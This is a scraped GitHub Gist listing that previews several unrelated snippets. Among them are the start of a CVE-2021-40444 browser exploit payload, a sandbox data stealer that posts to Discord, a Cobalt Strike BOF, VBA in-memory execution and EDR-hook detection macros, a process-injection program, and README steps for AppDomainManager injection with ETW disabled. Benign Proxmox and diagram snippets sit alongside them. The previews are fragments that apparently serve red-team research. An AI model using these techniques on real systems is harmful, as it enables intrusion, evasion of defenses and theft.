Skip to content

Instantly share code, notes, and snippets.

@D4stiny
D4stiny / cve202140444_ie.html
Created January 7, 2022 09:16
CVE-2021-40444 payload ported for Internet Explorer
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Expires" content="-1">
<meta http-equiv="X-UA-Compatible" content="IE=11">
</head>
<body>
<script>
var exploit_cab = "[CAB file URL]";
@tomdaley92
tomdaley92 / README.md
Last active June 17, 2024 16:39
Proxmox - SPICE Client setup for MacOS

Proxmox - SPICE client setup for MacOS

  1. Install a working (and compiled) version of virt-viewer. You may view the homebrew package's upstream source on GitHub.

    brew tap jeffreywildman/homebrew-virt-manager
    brew install virt-viewer
  2. Once that's installed should be able make a call remote-viewer with a pve-spice.vv file downloaded from proxmox web interface

@Albocoder
Albocoder / sandbox-env-stealer.py
Last active February 16, 2022 14:45
The python code used to take the environment data from sandboxes and send them to discord server.
#################################################################################
# #
# Refer to this blog post about what this code is used for: #
# https://albocoder.github.io/malware/2021/06/01/SandboxStudy.html #
# #
#################################################################################
import requests
import os
import psutil
@G0ldenGunSec
G0ldenGunSec / EnumCLR.c
Last active February 23, 2024 10:37
Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.
#include <string.h>
#include <stdio.h>
#include <windows.h>
#include <psapi.h>
#include "beacon.h"
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcesses(DWORD *, DWORD, LPDWORD);
DECLSPEC_IMPORT WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcessModulesEx(HANDLE, HMODULE*, DWORD, LPDWORD, DWORD);
Declare PtrSafe Function DispCallFunc Lib "OleAut32.dll" (ByVal pvInstance As Long, ByVal offsetinVft As Long, ByVal CallConv As Long, ByVal retTYP As Integer, ByVal paCNT As Long, ByRef paTypes As Integer, ByRef paValues As Long, ByRef retVAR As Variant) As Long
Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Const CC_STDCALL = 4
Const MEM_COMMIT = &H1000
Const PAGE_EXECUTE_READWRITE = &H40
Private VType(0 To 63) As Integer, VPtr(0 To 63) As Long
@X-C3LL
X-C3LL / hookdetector.vba
Created December 7, 2020 22:31
VBA Macro to detect EDR Hooks (It's just a PoC)
Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr
Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long)
'VBA Macro that detects hooks made by EDRs
'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa)
Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer
Dim address As LongPtr
@jfmaes
jfmaes / DInjectQueuerAPC.cs
Created November 13, 2020 19:00
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace DinjectorWithQUserAPC
{
public class Program
@HarmJ0y
HarmJ0y / Jenkinsfile
Created November 2, 2020 23:15
Rubeus Jenkinsfile
@Library('ci-jenkins-common') _
// Jenkins build pipeline (declarative)
// Project: Seatbelt
// URL: https://github.com/GhostPack/Seatbelt
// Author: @tifkin_/@harmj0y
// Pipeline Author: harmj0y
def gitURL = "https://github.com/GhostPack/Seatbelt"
@dylanroy
dylanroy / Sample Architecture Diagram
Last active April 2, 2024 15:01
Code snippets from Medium Blog Post Create Beautiful Architecture Diagrams with Python
from diagrams import Cluster, Diagram
from diagrams.gcp.analytics import BigQuery, Dataflow, PubSub
from diagrams.gcp.compute import AppEngine, Functions
from diagrams.gcp.database import BigTable
from diagrams.gcp.iot import IotCore
from diagrams.gcp.storage import GCS
with Diagram("Media Monitoring Storage Architecture", show=False) as med_diag:
pubsub = PubSub("pubsub")
flow = Dataflow("DataFlow")
@byt3bl33d3r
byt3bl33d3r / README.md
Last active May 3, 2024 15:52
Remote AppDomainManager Injection

This is a variation of the technique originally discovered by subtee and described here

TL;DR It essentially allows you to turn any .NET application into a lolbin by providing a configuration file and specifying the <appDomainManagerAssembly> element pointing to a specially crafted .NET assembly which executes when the application is loaded.

This variation allows you to load the AppDomainManager assembly from a UNC path or HTTP(s) server. Also disables ETW thanks to the <etwEnable> element :)

  1. Copy some binary you love to say, C:\Test. Lets use aspnet_compiler.exe as an example
  2. Compile test.cs to test.dll with a signed strong name, this is required to load an assembly outside of a .NET applications base directory.
  3. Host test.dll on a remote SMB or HTTP(S) server